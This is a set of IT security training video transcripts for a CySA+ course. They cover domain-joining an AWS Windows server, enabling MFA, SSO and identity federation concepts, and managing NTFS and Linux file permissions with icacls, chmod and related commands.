sub option in the navigation pane and its corresponding blade opens in the content pane. The blade includes
the table with multiple columns and four rows. The column headers include Name and Instance State. He
points to WinSrv2019-2 and WinSrv2019-1 row entries under the Name column header and their respective
Instance State is running. [Video description ends]
So what I'm going to do is I'm going to go and remote desktop into the first server here because I want to join it
to the domain.
[Video description begins] He selects a checkbox adjacent to the WinSrv2019-1 row entry. [Video description
ends]
So I've got that machine selected here. When I click Connect, it will allow me to download a remote desktop
file. And I can also click Get Password to decrypt the administrator password.
[Video description begins] He clicks a button labeled "Connect". A dialog box labeled "Connect to your
instance" opens. It includes buttons labeled "Download Remote Desktop File" and "Get Password". He clicks
the Get Password button. A button labeled "Choose File" and a text field displays. Then he highlights a text
labeled "Key Pair Path" adjacent to the Choose File button. [Video description ends]
I have to choose my private key file which would have been created previously and downloaded and stored
safely on my machine. Once I've specified that key and decrypted the password, I can see the remote desktop
password here. So I'm just going to go ahead and download the remote desktop file so we can get into that
machine and join it to the domain. So I've downloaded the RDP file.
[Video description begins] He clicks a button labeled "Back" and the Download Remote Desktop File button
and Public DNS, User name, and Password information displays. He copies the decrypted Password. [Video
description ends]
I'm going to go ahead and click on it. And tell it not to ask me to trust this computer in the future. And I'll just
paste in the decrypted admin password here. And I'm going to RDP into this machine. It's no different than
RDPing into an on-premises Windows server.
[Video description begins] He clicks the Download Remote Desktop File button and its file downloads and
displays at the bottom of the browser. Then he opens the downloaded file and a dialog box labeled "Remote
Desktop Connection" opens. He selects a checkbox labeled "Don't ask me again for connection to this
computer". Then he clicks a button labeled "Connect" and the dialog box closes. A dialog box with a progress
bar displays to show configuring remote network status. A dialog box labeled "Windows Security" opens. He
pastes the decrypted password in a text box labeled "Administrator". Then he clicks a button labeled "OK"
and the Windows Security dialog box closes. A dialog box with a progress bar displays to show configuring
remote network status. The Remote Desktop Connection dialog box opens. He selects a check box labeled
"Don't ask me again for connection to this computer". Then he clicks a button labeled "Yes" and the Remote
Desktop Connection dialog box closes. A dialog box with a progress bar displays to show configuring remote
network status. [Video description ends]
Only difference is this one's running on someone else's equipment in the public cloud. Now what I want to do
is make sure that I point this computer to the DNS server IP addresses that we looked at when we initially
started this.
[Video description begins] The dialog box with a progress bar closes. A remote desktop window
displays. [Video description ends]
So here in my Windows host, I'm just going to go into the Start menu and let's say into the Control Panel. So
we can configure our network adapter settings. So I'll click Network and Internet, Network and Sharing
Center, and in here, I'm going to click Change adapter settings.
[Video description begins] The Control Panel window opens. [Video description ends]
[Video description begins] A folder labeled "Network Connections" opens. It includes a network adapter
labeled "Ethernet". [Video description ends]
So I'll right-click on it and go into the Properties of it. And I'm interested in Internet Protocol Version 4. I'll
double-click there.
[Video description begins] A dialog box labeled "Ethernet Properties" opens. He double-clicks a setting
labeled "Internet Protocol Version 4 (TCP/IPV4)" and its corresponding dialog box opens. [Video description
ends]
And here's where I want to change the DNS server information. So I want to specify the DNS server addresses; there are two of them that we saw when we initially looked at our cloud-based Active Directory deployment.
[Video description begins] He highlights 127 in the DNS server address mentioned in a text box labeled
"Preferred DNS server". [Video description ends]
So once I've done that, I'm going to go ahead and click OK and all that stuff is great.
[Video description begins] The Preferred DNS server text box populates with 172.31.92.197 DNS server and a
text box labeled "Alternate DNS server" populates with 172.31.0.187 DNS server. Then he closes the Internet
Protocol Version 4 (TCP/IPv4) Properties dialog box and then the Ethernet Properties dialog box
closes. [Video description ends]
From the Start menu on my server, I'm now going to click on Control Panel, where I'm going to go into System and Security, and then System, where I can see the current computer name and the fact that it's in a workgroup called WORKGROUP. Then I'll click Change settings, and I'm going to click the Change button.
[Video description begins] The Control Panel window opens. He clicks a link labeled "System" and the basic
information about computer displays which includes Computer name, domain, and workgroup settings, and a
link labeled "Change settings". [Video description ends]
So I'm going to specify a new computer name and I'm going to specify the name of the Active Directory
domain I want to join this machine to. In this case quick24x7.local, and I'll click OK.
[Video description begins] He clicks the Change settings link and a dialog box labeled "System Properties"
opens which includes a button labeled "Change". He clicks the Change button and a dialog box labeled
"Computer Name/Domain Changes" opens. It includes a text box labeled "Computer name" with WinSrv2019-
2 value. It also includes a radio button labeled "Domain" and a text box linked to it. The text box contains
quick24x7.local value. [Video description ends]
And I'll then specify the credentials for the Active Directory domain. Which would have been specified when
that was deployed in the cloud and I'll click OK. Then we should get a message that says, welcome to the
domain, and we did, perfect.
[Video description begins] A dialog box labeled "Windows Security" opens. It includes two text boxes. The
first text box contains administrator value and the second text box contains a hidden password. [Video
description ends]
So I'm just going to click OK to get all the way back out and when it prompts you to restart, I will click Restart
Now. So now that I've rebooted, I've signed in with the domain administrator account. So if I were to go to the
command line, and let's just enlarge that a little bit. We can verify exactly who we are logged in as with the
whoami command.
[Video description begins] He opens the Administrator: Command Prompt window. The C:\Users\
Administrator.QUICK24X7> prompt is displayed. [Video description ends]
First, let's enlarge what we're looking at. So once we've done this, we can tell of course based on the path it put
us in who we're logged in as. But let's just verify it with the whoami command. Indeed, we are the
administrator in the quick24x7 domain. And if we were to go into our Control Panel just to triple check.
[Video description begins] He executes the whoami command. The output reads: quick24x7\administrator.
The prompt remains the same. [Video description ends]
Go into System and Security and then System, we'll see that indeed the machine is joined to the
quick24x7.local Active Directory domain. So at this point it's business as usual. We would install the tools that
we would normally use to manage users and groups in Active Directory and everything would be the same.
After completing this video, you will be able to recognize how MFA enhances sign-in security.
Objectives
[Video description begins] Topic title: Multifactor Authentication. The presenter is Dan Lachance. [Video
description ends]
An important aspect of user sign-in security is multi-factor authentication, otherwise called MFA. And if
you're on the internet doing pretty much anything these days you probably have experience with it. Such as in
addition to signing in with a username and password, maybe needing to have your smartphone nearby because
you're being texted an SMS code that you have to enter in addition to having knowledge of a username and
password before you can authenticate to a system. And that's what this is about. So it requires additional
authentication factors. For example, beyond the standard username and password. It can also use out-of-band
mechanisms to send authentication codes. Out-of-band would mean some other transmission mechanism
beyond what you're already using to try to sign in. So imagine that you're using a web browser to try to sign
into some site like eBay or PayPal. Well, you'll need a username and password for that, but it might also
require you to have a phone nearby so that it texts you a PIN, a code, that you must also enter. And because it
might be doing that through text messaging, that's a different transmission mechanism than over the Internet,
straight over the Internet as your web browser session is, so it's out of band. So multi-factor authentication is
by far more secure than just username and password. Username and password really constitute knowledge and
nothing more. And that knowledge could potentially be acquired by malicious users, thousands of miles away.
But requiring a smart phone, that's a bit of a different story, or a smart card, that makes it a little more difficult
to break into. Not that it's impossible, but it's more difficult. Multi-factor authentication then combines two or
more authentication categories. So maybe something you know, like a name and a password, and something
you have, like a smart card or a phone that has a six-digit PIN that you must enter. It could also be something
you know plus something you are. Something you are is biometric authentication, it could be your fingerprint
scan or an eye retinal scan or something along those lines. Multi-factor authentication might also be something
you have plus something you do. So something you have might be some kind of a hardware token to
authenticate to a VPN. Something you do might be a specific gesture-based authentication mechanism. In
IAM, identity and access management, we can enable MFA for users.
[Video description begins] IAM User MFA Enablement. [Video description ends]
Now how that's done specifically depends on your specific IAM solution. Generally speaking, you will select the IAM user for whom you wish to enable MFA. You will then assign an MFA device, whether it's a physical
device like a key fob, with a little screen with the code that changes. Or maybe it's a virtual MFA device. It's
an app on a phone, an authenticator app. The next thing that might happen, again it will vary, depending on the
system you're using, is that you might have to insert a USB device, or enter a device PIN, or scan a QR code.
This is all part of setting up or enabling MFA. So if I were to assign, for example, a virtual MFA device to a
user, then the user just needs an authenticator app, like Microsoft authenticator or Google Authenticator,
something like that on their device, on their smartphone. And so I could scan a QR code that would be used to
add an account on that device. Now when I say add an account, it would add a reference to the IAM user account
where MFA is being enabled. And then finally, we would enter the MFA codes that are still part of the setup of
MFA to initialize MFA for that account. Usually it'll be a collection of two unique PINs. Now, systems are different, but generally speaking, you'll be presented with a six-digit PIN that's good for 30 seconds. You enter the first one, wait 30 seconds, then enter the second one. That's why it says enter MFA
codes, after which MFA will have been successfully enabled for the selected user account. And when they sign
in in the future, they're going to need to know a username and a password and they'll have to enter a PIN, a six-
digit PIN for example.
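Since the demos in this course use AWS, here is a minimal sketch of what that enablement flow could look like from the AWS CLI rather than the console. The user name mbishop and the account ID are hypothetical placeholders, and the two authentication codes are simply two consecutive PINs read from the authenticator app.
# Create a virtual MFA device and save its QR code so the authenticator app can scan it
aws iam create-virtual-mfa-device --virtual-mfa-device-name mbishop-mfa --outfile qrcode.png --bootstrap-method QRCodePNG
# Enable MFA for the IAM user by supplying two consecutive codes from the app
aws iam enable-mfa-device --user-name mbishop --serial-number arn:aws:iam::111122223333:mfa/mbishop-mfa --authentication-code1 123456 --authentication-code2 654321
After the enable step succeeds, the next sign-in for that user prompts for a current six-digit code in addition to the username and password.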
[Video description begins] Topic title: Enabling MFA. The presenter is Dan Lachance. [Video description
ends]
What normally goes hand in hand with identity federation is single sign-on or SSO.
SSO provides automatic user sign-on to apps, now that's provided that they've already authenticated once. Now
you can do this in many different ways. For example, if you're using the Microsoft Azure cloud, you can use
Azure Active Directory Seamless SSO. But you can also enable SSO in many other solutions including on-
premises solutions, like Active Directory Federation Services.
[Video description begins] The full form of AD is Active Directory. [Video description ends]
Now, using a solution in the cloud like Azure Active Directory Seamless SSO would mean you'd have to
configure something called Azure AD Connect. Azure AD Connect is a link between your on-premises active
directory infrastructure and your Azure cloud-based Active Directory infrastructure.
Single sign-on methods include those for cloud applications as well as those that might be used for on-
premises apps. It's not just about cloud-based authorization to use something. And there is some overlap between the two, where a single solution could be used for either cloud or on-premises app SSO. OpenID
Connect is a standard that's used for authenticating.
And also OAuth is an authorization protocol that's used most commonly for the purpose of SSO, single sign-
on. The Security Assertion Markup Language or SAML single sign-on is yet another mechanism for SSO for
cloud apps. And password-based sign-on, what this means is that users would sign-on to the app with a
username and password for the first time, only the first time that they use that app. And after that, the identity
solution can remember those credentials, which essentially gives the impression of single sign-on, and in effect it is. Then there's an option for a linked type of SSO for a cloud application. What this means is that if
we've got another type of authentication provider configured, let's say Office 365, we want to allow those
authenticated connections to pass through to, let's say, something in the Microsoft Azure cloud. So it's linked.
On-premises, well, here's some similarities we've already talked about for cloud-based SSO. SAML, password-
based, linked, and then there's Integrated Windows Authentication on the Windows side of things. With
Integrated Windows Authentication, if you've already signed in successfully to a Windows host, let's say with
your Active Directory username and password, then you're automatically trusted to access other apps, provided those other apps support Integrated Windows Authentication, which is often called IWA, I-W-A. You've also got
another type of SSO that's called header-based authentication. This is really for web apps that examine HTTP
headers for authentication-based information that can determine whether a user needs to sign in again or
whether they've already signed in and already have specified their credentials. In which case, SSO should
allow them to connect automatically.
After completing this video, you will be able to recognize the role of identity federation across organizations,
including SSO.
Objectives
Identity federation, generally speaking, means using one trusted identity provider to provide the authentication
mechanism for a completely different app or a web site. So this means using a trusted identity provider,
otherwise called an IdP. An identity provider is where the user account information is stored and where
authentication actually takes place. Examples of IdPs include Microsoft Active Directory, whether on-premises
or in the cloud, or Facebook, or Google. All of those can serve as identity providers to allow access to
something completely outside of their own realms. Now the resource provider, or the RP, is the other
application or the other web site. For example, you might have a web site that allows you to authenticate using
your Google or Facebook credentials. So Google or Facebook in that case are the IdP, the site you're trying to
use that to get access to is the RP, the resource provider. So these are essentially web apps that trust the
identity provider. Then there's the notion of claims. A claim is an assertion about a user or a device. And that assertion has details about the user or the device, such as the user's date of birth, or the type of device a user is
using to authenticate, or the subnet from which that user is authenticating. Depending on the web app that the
user is trying to gain access to, it might require very specific claim details to be present when a user tries to
access that resource.
[Video description begins] Identity Federation and Claims. [Video description ends]
So pictured on the screen, here we have a user that's trying to access an app in the center. Now what happens
after the user tries to access the app is that the app will redirect the user to the identity provider for
authentication. Now over on the bottom-left here, the user will authenticate successfully. Under ideal
circumstances, the server will digitally sign a token. Now the token is an authentication item that says this user
is authenticated, and that token can contain one or more claims. Now what's a claim? Well, we see in the
bottom-right, a claim is considered to be a form of attribute-based access control. So the user's date of birth,
their manager, the city they're in, the type of device they're logging in with, all of that and many other possible
things constitute claims. So the claim information is written into the token. The token is digitally signed by the
server. So now what happens, and we see this at the top-center of our diagram, is the user is then authorized to
use the app they tried to sign in to in the first place. Now, all of this happens in the background. The user
doesn't see it happening, it's automatic. So all the user knows is they're trying to access an app, they enter in
their credentials, and then they're in the app. But in the background, that app did not do the authenticating.
Now the last thing you want to do in a busy enterprise is configure each and every app with its own authentication.
Instead, it's easier to have it defer that task to the identity provider and then trust the digitally-signed tokens
from the identity provider.
In this video, you will set permissions on a Windows NTFS file system.
Objectives
set permissions to a Windows NTFS file system
[Video description begins] Topic title: Window File System Permissions. The presenter is Dan
Lachance. [Video description ends]
Permissions can be set on a Windows machine using the GUI or using command line tools, whether at the
standard Windows command line or using PowerShell cmdlets. Here in this example, I'm looking at drive D on
my Windows host in a folder called SampleFiles where there are a number of files. And certainly at the GUI
level, we could right-click on, for example, a single file or multiple files or a folder, we can go into the
Properties and we can go into the Security tab to modify the NTFS file system permissions.
[Video description begins] He right-clicks a file labeled "CustomerDatabase.accdb". A flyout opens which
includes options labeled "Rename" and "Properties". He selects the Properties option and a dialog box
labeled "CustomerDatabase.accdb Properties" opens. It contains four tabs labeled "General", "Security",
"Details", and "Previous Versions". The General tab is selected. [Video description ends]
So these are permissions that apply both over the network when accessing these files if that's available. And
also it applies when accessing the files logged in locally on the host. So we can see users and groups, we can
edit, we can see the permissions, and all of that. But we can also do this from the command line, which we're
going to do.
[Video description begins] He closes the CustomerDatabase.accdb Properties dialog box. [Video description
ends]
So here on that same machine, I'm on Drive D and I'm in the SampleFiles folder. And what we're really
looking at doing here is using the icacls command line tool.
[Video description begins] He opens a Command Prompt window. The D:\SampleFiles> prompt is displayed.
He executes the icacls command. The output displays detailed information and examples of icacls. The prompt
remains the same. [Video description ends]
The icacls command line tool lets you modify access control lists or ACLs for Windows file systems and so
one of the things that we're going to do here is start by running icacls . Now, the dot references the current
directory we can see here, that's D:\SampleFiles. When I press Enter, I'll see any entities or security principals
that have permissions here. First entry we see is the BUILTIN\Administrators group.
[Video description begins] He executes the cls command. The screen gets clear and the prompt remains the
same. Then he executes the icacls . command. The output displays a message which reads: Successfully
processed 1 files; Failed processing 0 files. The prompt remains the same. [Video description ends]
And the capital I here means inherited, permissions are inherited, in this case, from above from the root of
drive D. And it's full control, F for full control. We also see items like OI, which is object inherit, CI, container
inherit. So we can see users and groups that might have permissions at this level. For example, the BUILTIN\
Users group we see here has inherited the RX permission set in other words, that's read and execute. Now
another cool thing we can do here is run icacls and we can take all of this information and back it up. So let's
see how that would work. We could say, I want to take the current directory, so dot. So icacls .\*.*. I want to
get the permissions, not only for the folder itself, which is what we looked at, but for all the files within the
folder.
[Video description begins] He executes the icacls .\*.* command. The output displays a list of individual files
and their permission granted to a group or a user. The prompt remains the same. [Video description ends]
Actually, let's just do that and press Enter. You can see here it's giving us a listing for all the individual files
and the ACL or the permissions assigned for each individual file. So we can see whether it's users or groups
and the permissions that have been assigned. So, having that knowledge, let's bring that previous command back up with the up-arrow key. Let's add to it. So what I want to do then is run /save, a forward slash save. And I want to store that on the root of drive D, let's say, and I want to call the file acls.txt. Okay, looks like it did
something.
[Video description begins] He executes the cls command and the screen gets clear. The prompt remains the
same. Then he executes the following command: icacls .\*.* /save d:\acls.txt. The output displays a list of
processed files. The prompt remains the same. [Video description ends]
Well, let's run notepad against it, notepad d:\acls.txt. Okay, cool, so it looks like it's got all the individual files
and all the permissions set. So the good thing about this is that we can restore those permissions at any point in
the future.
[Video description begins] He executes the notepad d:\acls.txt command. The acls.txt file opens in the Notepad
application. The prompt remains the same. He closes the acls.txt file. [Video description ends]
Now, normally backup software will have an option so you can have this as part of your backup and restore
procedures automatically. But it's still nice to know that we can do it at this level. And now I'm going to run an
icacls and . current directory and I'm going to use /inheritance and :d. I want to delete or remove the
inheritance.
[Video description begins] He clears the screen. The prompt remains the same. Then he executes the icacls .
/inheritance:d command. The output reads: processed file: . Successfully processed 1 files; Failed processing
0 files. The prompt remains the same. [Video description ends]
Now when I do that, if I look at the ACL for the current folder, we've lost, for example, the capital I that the first entry BUILTIN\Administrators used to have for inherited prior to full control. But now we've basically copied over the ACL entries as explicit entries at this level instead of being inherited from above. Okay,
so let's pick on this entry here, the BUILTIN\Users group, which currently has read and execute.
[Video description begins] He executes the icacls . command. The output displays authorization information.
The prompt remains the same. He highlights BUILTIN\Administrators:(F) in the output. [Video description
ends]
I want the BUILTIN\Users group, some members of that group to also have the write permission W.
[Video description begins] He highlights BUILTIN\Users: (RX) in the output. [Video description ends]
So we can change that by running icacls against the current directory, assuming that's what we want to apply it to, so . /grant. And users is the subject here, that's the group, and :W. I want to grant write. Looks like it did; it says it successfully processed 1 file.
[Video description begins] He executes the following command: icacls . /grant users:W. The output reads:
processed file: . Successfully processed 1 files; Failed processing 0 files. The prompt remains the same. [Video
description ends]
Okay, let's clear the screen and let's just run icacls . again. And indeed we can now see the W has been added
for the BUILTIN\Users group. Of course, we can remove it in a similar manner.
[Video description begins] He executes the icacls . command. The output displays authorization information.
The prompt remains the same. He highlights BUILTIN\Users: (RX,W) in the output. [Video description ends]
So icacls. What's going to be different here is we're going to use /remove instead of /grant like we did to grant
permissions and we'll specify users and we'll just clear the screen here and we'll just take a look at the icacls
command for the current directory.
[Video description begins] He executes the icacls . /remove users command. The output reads: processed file: .
Successfully processed 1 files; Failed processing 0 files. The prompt remains the same. [Video description
ends]
And users isn't even here anymore because we've actually completely removed the entry from the ACL. We
can also reset this back to its original form, so icacls . /reset.
[Video description begins] He executes the icacls . command. The output displays authorization information.
The prompt remains the same. [Video description ends]
And if we just take a look we're back to inherited permissions and there's Users again, with just the standard
inherited and read and execute.
[Video description begins] He executes the icacls . /reset command. The output displays the authorization
information. The prompt remains the same. Then he executes the icacls . command. The output displays
authorization information. The prompt remains the same. Then he highlights I and F in the following output
line: BUILTIN\Administrator: (I)(F). Then he highlights Users in the following output line: BUILTIN\Users:
(I)(RX). [Video description ends]
And if we actually wanted to restore that backup file of ACLs, we could do that too if we really wanted to.
icacls for the current directory /restore, that's the keyword. And then we give it the path and name of the file.
So it's called acls.txt. And then after that, we're good to go; we're back to where we were when we
originally took the backup. So there's quite a bit you can do then using the icacls command to manage
Windows file system ACLs at the command line.
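Here is a quick recap sketch of the icacls workflow from this demo, run from D:\SampleFiles; d:\acls.txt is just the example backup path used above.
rem View the ACL of the current folder
icacls .
rem Back up the ACLs of every file in the folder to a text file
icacls .\*.* /save d:\acls.txt
rem Disable inheritance, copying the inherited entries as explicit entries
icacls . /inheritance:d
rem Grant the Users group the write permission
icacls . /grant users:W
rem Remove the Users entry entirely
icacls . /remove users
rem Reset back to the inherited defaults
icacls . /reset
rem Reapply the previously saved ACLs
icacls . /restore d:\acls.txt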
[Video description begins] He executes the following command: icacls . /restore d:\acls.txt. The output reads:
Not all privileges or groups referenced are assigned to the caller. Successfully processed 0 files; Failed
processing 0 files. The prompt remains the same. Then he executes the icacls . command. The output displays
authorization and inheritance information of administrator, system, and users. The prompt remains the
same. [Video description ends]
In this video, find out how to set permissions on a Linux EXT4 file system.
Objectives
[Video description begins] Topic title: Linux File System Permissions. The presenter is Dan Lachance. [Video
description ends]
There are many different ways to work with permissions in a UNIX and Linux environment.
[Video description begins] A command prompt window labeled "dlachance@kali ~" is open. The root@kali:/#
prompt is displayed. [Video description ends]
Let's start here by creating a folder on the root of the file system. So I'll do that with mkdir. And I'm going to
call it /sharedfiles, slash meaning I want it on the root of the file system.
[Video description begins] He executes the mkdir /sharedfiles command. No output displays. The prompt
remains the same. [Video description ends]
Now, if I do an ls -ld, so long listing directory and I tell it I want to look at sharedfiles. Well, we are already in
the root by putting in slash in front of it. Then I can see the default permission set here.
[Video description begins] He executes the ls -ld /sharedfiles/ command. The output displays a message which
reads: drwxr-xr-x 2 root root 4096 Mar 5 12:59 /sharedfiles/. The prompt remains the same. [Video
description ends]
So I can see that there's a d at the beginning, it's a directory entry. Then I see the permissions here for the
owning user, which is seen here as root, so read, write, execute. Then the second set of permissions in this
case, which is only read and execute would be for the owning group, which happens to also be called root here.
And the last three permissions here, r and x, so read and execute again, are for everybody else. So everybody other
than the owning user and the owning group.
[Video description begins] He highlights drwxr-xr-x 2 root root in the output. [Video description ends]
Now, we can change permissions here at a standard level with UNIX and Linux in terms of changing the
owning user or the owning group. So for example, I'm going to add a group here called hr, human resources.
[Video description begins] He executes the groupadd hr command. No output displays. The prompt remains
the same. [Video description ends]
And if I do a tail, let's say of the /etc/group file, we can see we've got an hr group, human resources.
[Video description begins] He executes the tail /etc/group command. The output displays a list of users and
admins to which group they belong. The prompt remains the same. He points to hr:x:1002: in the
output. [Video description ends]
Now, there's no one in it yet, but that's okay. We can do that if we really wanted to. I'm going to add a user
here, let's say useradd mbishop. And what I want to do is add that user to the group hr, so -g hr.
[Video description begins] He executes the useradd mbishop -g hr command. No output displays. The prompt
remains the same. [Video description ends]
Okay, so now, if I were just to tail, I'll use the up-arrow key again. If I were to tail the /etc/group file, nothing has changed with the hr group with an ID of 1002.
[Video description begins] He executes the tail /etc/group command. The output displays a list of users and
admins to which group they belong. The prompt remains the same. He highlights hr:x:1002: in the
output. [Video description ends]
However, if I were to tail /etc/passwd, we can see mbishop is in that group. There's the group ID, so that's the
affiliation or the association with that.
[Video description begins] He clears the screen. Then he executes the tail /etc/passwd command. The output
displays information about system's accounts which includes user ID, group ID, home directory, and shell.
The prompt remains the same. He highlights 1002 in the output. [Video description ends]
Now what I can do is I can run change group or chgrp. I want to change group to hr for /sharedfiles. What does
that mean? It means I want the owning group to be hr; it used to be root. Now in this case, we've got a typo. The folder name is sharedfiles in the plural, not the singular. That's why we had a message about no such file or directory. That's easily fixed, it's done.
[Video description begins] He executes the chgrp hr /sharedfiles command. No output displays. The prompt
remains the same. [Video description ends]
Let's take a look once again using ls -ld /sharedfiles. And again, just a little typo there, shared with a d, there
we are. So now hr is the owning group.
[Video description begins] He clears the screen. The prompt remains the same. Then he executes the ls -ld
/sharedfiles command. The output reads: drwxr-xr-x 2 root hr 4096 Mar 5 12:59 /sharedfiles. The prompt
remains the same. [Video description ends]
And what that means is members of the hr group like the user we added, mbishop, now will get the owning
group permissions, which in this case are simply read and execute. Now we can also change the permissions if
we really wanted to using the change mode command chmod. Now r or read has a numeric value of 4, write is
2, and execute is 1. So, if we want to give all the permissions, let's say for the hr group, read, write, and
execute, that would be 4 for read, that would be 2 for write or w, and then 1 for execute. So 4 plus 2 plus 1,
that's 7. So if I were to do this, chmod 77 and let's say 0. What does that mean? Well, let's put in the subject
here, which is /sharedfiles. This time, I'll make sure I spell it correctly, d and there's an s. The first 7 here
means that we want to have all permissions for the owning user. The second 7 means we want all the
permissions for the owning group. And the 0 would mean nothing for everyone else. Let's see what happens
here.
[Video description begins] He executes the chmod 770 /sharedfiles. No output displays. The prompt remains
the same. [Video description ends]
All right, let's bring up that previous command ls -ld of /sharedfiles. Notice indeed that the first 7, well, that
was already in place. But it's still working. That's read, write, execute, 4 plus 2 plus 1, which is 7. And the
second 7 here gives us read, write, execute for the owning group, which we've changed now to hr. And then
the last 0 means no permissions for everyone else. So nobody outside of the root user account or members of hr will have access
to the sharedfiles folder.
[Video description begins] He executes the ls -ld /sharedfiles command. The output reads: drwxrwx--- 2 root
hr 4096 Mar 5 12:59 /sharedfiles. The prompt remains the same. [Video description ends]
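As a recap sketch of the commands used in this demo, plus a symbolic-mode equivalent of the chmod step (the symbolic form is my own addition; the demo itself uses the numeric form):
# Create the hr group and a user whose primary group is hr
groupadd hr
useradd mbishop -g hr
# Make hr the owning group of the folder
chgrp hr /sharedfiles
# rwx for the owning user and group, nothing for everyone else
chmod 770 /sharedfiles
# Symbolic equivalent of the numeric mode above
chmod u=rwx,g=rwx,o= /sharedfiles
# Verify: should show drwxrwx--- 2 root hr ... /sharedfiles
ls -ld /sharedfiles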
13. Video: Course Summary (it_cscysa20_09_enus_13)
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined on-premises and cloud-based user account configurations to maximize
authentication and authorization security. We did this by exploring the role of identity and access management,
otherwise called IAM. We looked at how to create IAM users, groups and roles, in Amazon Web Services. We
looked at how to configure user permission policies in AWS, how to deploy Simple Active Directory in AWS,
and also how to join a cloud virtual machine to a cloud-based directory service. Next, we looked at how multi-
factor authentication or MFA enhances sign-in security. We learned how to enable IAM user MFA, and we
talked about the role of identity federation across organizations. And finally, how to set permissions for both
Windows NTFS and Linux EXT4 file systems. In our next course, we'll move on to explore the management
of network infrastructure security, including cloud-based virtual network configurations, VPNs, and Virtual
Desktop Infrastructure or VDI.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+ certification exam
is designed for IT professionals looking to gain security analyst skills to perform data analysis, to identify vulnerabilities, threats, and risks to an organization, to configure and use threat detection tools, and to secure and protect an organization's applications and systems. In this course, we're going to explore securing network
infrastructure including cloud based virtual network configurations, resource tagging, VPNs, and virtual
desktop infrastructure or VDI.
I'll start by comparing the management of network security both on-premises and in the cloud. And we'll
examine tools for identifying and classifying sensitive systems and data. I'll then demonstrate cloud resource
tagging, explore security enhancement through network segmentation, and select a VPN solution based on
business needs. Next, I'll demonstrate how to link an on-premises network to the AWS cloud through a site-to-
site VPN. I will explore the design of a cloud networking strategy, and deploy a virtual private cloud or VPC
in AWS. I'll continue with an examination of change management procedures and the benefits of VDI. I'll then
show how to configure and connect to a cloud VDI and examine the different types of firewalls for protecting
digital assets. Lastly, I'll demonstrate how to configure a Windows-based firewall and an AWS network security group, NSG. And then we'll explore network access control, RADIUS, and TACACS+, and we'll define the roles that they play in securing a network environment and controlling network access.
During this video, you will learn how to identify similarities and differences when managing network security
on-premises and in the cloud.
Objectives
identify similarities and differences when managing network security on-premises and in the cloud
[Video description begins] Topic title: On-premises and Cloud Management. The presenter is Dan
Lachance. [Video description ends]
There are a lot of parallels that can be drawn between on-premises IT environments and cloud-based IT
environments including at the security level.
[Video description begins] On-premises and Cloud IT Management. [Video description ends]
At the network level or infrastructure level, we have to deal with things like subnets and IP addressing used for
those subnets, DNS name resolution, VPN encrypted tunnels, such as linking an on-premises network into the
cloud or linking offices together, even without using cloud computing. There's encryption of data at rest and
data transmissions over the network. There's general hardening procedures, things like removing unnecessary
services, changing default usernames or passwords, and also continuous monitoring to ensure the efficacy of
security controls. That is the same in principle, whether you deal with an on-premises environment or the
cloud.
At the storage infrastructure level, other things we would normally consider on-premises would include
different levels of RAID. So arranging groups of disks together to maximize performance and data availability.
Also determining the IOPS, that is the input and output operations per second, which is a measure of
throughput within a disk subsystem. Also data retention periods, data availability, that relates back to RAID,
whether we encrypt data at rest, hardening our storage environment, and monitoring performance metrics, and
even auditing access to sensitive files. Now a lot of that applies in the cloud as it does to on-premises.
One of the variations certainly would be RAID levels. In a cloud computing environment, as a cloud tenant or
cloud customer, you're using IT services running on somebody else's hardware. So hardware RAID configuration
would not be something that would apply to a cloud customer in that scenario. Then there's the compute part of
the infrastructure, physical hosts, virtual machines running on hosts, and the amount of CPUs and RAM
available physically in terms of hardware resources, remote management to operating systems, as well as to
physical hosts at the hardware level, and the hardening and monitoring of that compute environment.
Now even in the cloud, there are some ways that you can have dedicated physical hosts that run virtual
machines only that your organization deploys. So it doesn't house any virtual machines run by other cloud
customers. This is possible, but of course, you pay a premium for this type of solution.
[Video description begins] Data Center Equipment Racks. [Video description ends]
The other thing to think about is data center equipment racks. So whether you're doing this in your own data
center or server room, or at the cloud provider level. We need to make sure that the data center or server rooms are locked down, and that equipment racks are locked. So that if someone happened to get into that
environment, they wouldn't be able, for example, to steal disks from a storage array because it would be behind
a locked door in an equipment rack. So, when we do this on-premises, it's a capital investment because the
organization has to invest in acquiring this equipment. Then of course, there's the physical security aspect
we've mentioned, such as locking up equipment racks.
Then the physical architecture kicks in. Now certainly, this is a big deal on-premises and in the cloud for the
cloud service provider, it's a big concern. We have to think about physical property and facility security.
Heating, ventilation, and air conditioning to keep equipment running smoothly. Power generators that might kick
in, in the event of a power grid disruption. Replication of data to alternate regions, in the event of a disaster in
the primary region. And even Internet connection redundancy, having more than one link to the Internet. For
example, if we've got an on-premises data center that we're linking to a public cloud provider, we want to
make sure if that is used for mission critical apps that we've got more than one network link going to the cloud,
ideally from multiple vendors. MVPC can be used even at the storage network level, to have redundant paths
to storage appliances through equipment from different vendors.
[Video description begins] Multi vendor pathway connectivity is abbreviated as MVPC. [Video description
ends]
But it also can apply to having different Internet links from different Internet service providers. So the design
of a cloud environment is going to be crucial then in ensuring an organization's success in using the cloud, such
as with tenant partitioning.
That means keeping cloud customers separate from one another in terms of the services they use, the configuration of those services, and certainly the data stored in the cloud. It also means applying the appropriate access control mechanisms. That could apply, for example, at the user account level used to sign
in to manage cloud resources and the permissions granted for allowing limited management of cloud items. Such as only allowing the management of cloud storage as opposed to allowing the management of cloud-
based virtual machines.
[Video description begins] Tenant Partitioning. [Video description ends]
The other thing to think about is with tenant partitioning, having multiple identity services. So for identity and
access management, one cloud customer, for example, might deploy an instance of active directory in the
cloud. Whereas, another customer might do the same thing but they are kept completely separate from one
another. Tenant partitioning would apply of course for all cloud services. Whether it's infrastructure as a
service, platform as a service, or software as a service. So we've got secure isolation of resources, including
data amongst cloud tenants, and separate user directories for users and groups.
Again, that goes back to our example of multiple active directory instances that are kept separate for different
cloud customers. Separate cloud service resources and configurations is also an important part of this. So
because of tenant partitioning, cloud providers can support multiple customers simultaneously while assuring
those customers that they have their own isolated computing environment.
